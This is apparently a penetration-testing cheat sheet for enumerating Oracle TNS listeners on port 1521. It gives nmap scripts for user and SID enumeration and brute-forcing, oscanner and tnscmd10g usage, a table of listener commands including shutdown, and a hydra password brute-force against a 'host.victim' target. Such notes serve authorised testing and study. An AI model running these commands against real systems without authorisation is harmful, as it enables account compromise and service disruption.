Oracle (Port 1521)
Quick Intro
Oracle database (Oracle DB) is a relational database management system (RDBMS) from the Oracle Corporation (from here).
When enumerating Oracle the first step is to talk to the TNS-Listener that usually resides on the default port (1521/TCP, -you may also get secondary listeners on 1522–1529-).
Nmap Script
nmap -p 1521 -A $ip
nmap -n -v -sV -Pn -p 1521 –script=oracle-enum-users –script-args sid=ORCL,userdb=users.txt $ip
nmap --script "oracle-tns-version" -p 1521 -T4 -sV <IP>
# TNS listener version
nmap --script=oracle-sid-brute $ip
nmap -n -v -sV -Pn -p 1521 --script=oracle-brute $ip
# Brute-Force Account
oscanner
oscanner -s $ip -P 1521
Fingerprint oracle tns
tnscmd10g = A tool to prod the oracle tnslsnr process
tnscmd10g version -h 192.168.1.101
tnscmd10g status -h 192.168.1.101
Other useful TNS listener commands:
Command
Purpose
ping
Ping the listener
version
Provide output of the listener version and platform information
status
Return the current status and variables used by the listener
services
Dump service data
debug
Dump debugging information to the listener log
reload
Reload the listener configuration file
save_config
Write the listener configuration file to a backup location
stop
Invoke listener shutdown
If you receive an error, could be because TNS versions are incompatible (Use the --10G
parameter with tnscmd10
) and if the error persist, the listener may be password protected (you can see a list were all the errors are detailed here) — don't worry… hydra to the rescue:
hydra -P rockyou.txt -t 32 -s 1521 host.victim oracle-listener
Last updated